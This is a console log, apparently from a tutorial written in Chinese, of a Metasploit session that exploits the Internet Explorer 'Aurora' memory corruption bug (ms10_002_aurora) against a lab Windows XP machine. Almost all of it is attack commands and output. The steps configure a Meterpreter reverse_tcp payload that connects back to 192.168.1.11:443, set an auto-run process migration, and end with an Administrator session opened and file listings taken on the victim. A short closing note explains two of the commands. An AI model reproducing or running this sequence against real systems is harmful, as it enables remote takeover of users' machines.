root@bt:~# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show advanced
Module advanced options:
Name : ContextInformationFile
Current Setting:
Description : The information file that contains context information
Name : DisablePayloadHandler
Current Setting: false
Description : Disable the handler code for the selected payload
Name : EnableContextEncoding
Current Setting: false
Description : Use transient context when encoding payloads
Name : ListenerComm
Current Setting:
Description : The specific communication channel to use for this service
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show advanced
Module advanced options:
Name : ContextInformationFile
Current Setting:
Description : The information file that contains context information
Name : DisablePayloadHandler
Current Setting: false
Description : Disable the handler code for the selected payload
Name : EnableContextEncoding
Current Setting: false
Description : Use transient context when encoding payloads
Name : ListenerComm
Current Setting:
Description : The specific communication channel to use for this service
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
Payload advanced options (windows/meterpreter/reverse_tcp):
Name : AutoLoadStdapi
Current Setting: true
Description : Automatically load the Stdapi extension
Name : AutoRunScript
Current Setting:
Description : A script to run automatically on session creation.
Name : AutoSystemInfo
Current Setting: true
Description : Automatically capture system information on initialization.
Name : EnableUnicodeEncoding
Current Setting: true
Description : Automatically encode UTF-8 strings as hexadecimal
Name : InitialAutoRunScript
Current Setting:
Description : An initial script to run on session creation (before
AutoRunScript)
Name : ReverseAllowProxy
Current Setting: false
Description : Allow reverse tcp even with Proxies specified. Connect back will
NOT go through proxy but directly to LHOST
Name : ReverseConnectRetries
Current Setting: 5
Description : The number of connection attempts to try before exiting the
process
Name : ReverseListenerBindAddress
Current Setting:
Description : The specific IP address to bind to on the local system
Name : ReverseListenerComm
Current Setting:
Description : The specific communication channel to use for this listener
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
msf exploit(ms10_002_aurora) > set AutoRunScript migrate -f
AutoRunScript => migrate -f
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:443
msf exploit(ms10_002_aurora) > [*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.11:80/
[*] Server started.
[*] 192.168.1.142 ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.142:1051) at 2013-04-28 03:55:55 -0400
msf exploit(ms10_002_aurora) >
msf exploit(ms10_002_aurora) > se
[*] Session ID 1 (192.168.1.11:443 -> 192.168.1.142:1051) processing AutoRunScript 'migrate -f'
ssio[*] Current server process: IEXPLORE.EXE (3068)
[*] Spawning notepad.exe process to migrate to
n[+] Migrating to 3452
[+] Successfully migrated to process
msf exploit(ms10_002_aurora) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 ROOT-9743DD32E3\Administrator @ ROOT-9743DD32E3 192.168.1.11:443 -> 192.168.1.142:1051 (192.168.1.142)
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: $U$C:\Documents and Settings\Administrator\-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f725cd7c0c3e6
===============================================================================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2012-03-23 23:47:29 -0400 .
40777/rwxrwxrwx 0 dir 2013-04-27 11:33:04 -0400 ..
meterpreter >
上面的命令中:
msf exploit(ms10_002_aurora) > show advanced
用来显示高级选项。
msf exploit(ms10_002_aurora) > set AutoRunScript migrate -f
用来设置自动运行的脚步,我设置为自动迁移进程到新的进程。
在XP里,用IE访问http://192.168.1.11/,同时查看任务管理器,会看到CPU使用率很大,但是很快,IE自动关掉了,CPU使用率马上变得很小。